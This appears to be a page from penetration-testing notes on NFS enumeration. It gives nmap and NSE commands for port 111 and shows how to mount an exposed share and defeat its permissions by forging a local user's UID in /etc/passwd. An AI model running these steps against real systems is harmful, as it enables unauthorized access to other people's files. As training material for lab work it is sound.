NFS
Last updated
Was this helpful?
Last updated
Was this helpful?
Network File System: allows a user on a client computer to access files over a computer network as if they were on locally-mounted storage.
Portmapper and RPCbind: run on TCP port 111. RPCbind maps RPC services to the ports on which they listen. RPC processes notify rpcbind when they start, registering the ports they are listening on and the RPC program numbers they expect to serve. The client system then contacts rpcbind on the server with a particular RPC program number. The rpcbind service redirects the client to the proper port number (often TCP port 2049) so it can communicate with the requested service. We can scan these ports with nmap using the following syntax below.
Scan for NFS open:
#nmap -v -p 111 10.11.1.1-254
Rpcinfo to find services that may have registered with rpcbind:
#nmap -sV -p 111 --script=rpcinfo 10.11.1.1-254
NMAP NSE for NFS:
#nmap -p 111 --script nfs* 10.11.1.72
If we get a result like this where we have a directory we can mount then the synax is:
#mount -o noclock 10.11.1.72:/home ~/home/ //-o nolock is used to disable file locking
#cd home/ && ls
We got denied the file read so we decide to try and add a user with the same UUID of 1014.
#sudo adduser pwn //we automatically got assigned the 1001 user so we will need to change it to 1014 to read the file.
#sudo sed -i -e 's/1001/1014/g' /etc/passwd //-i inline replace, -e execute script
check with:
#cat /etc/passwd | grep pwn
#su pwn
#id
Attempts to get useful information about files from NFS exports. The output is intended to resemble the output of ls.
Shows NFS exports, like the showmount -e command.
Retrieves disk space statistics and information from a remote NFS share. The output is intended to resemble the output of df.
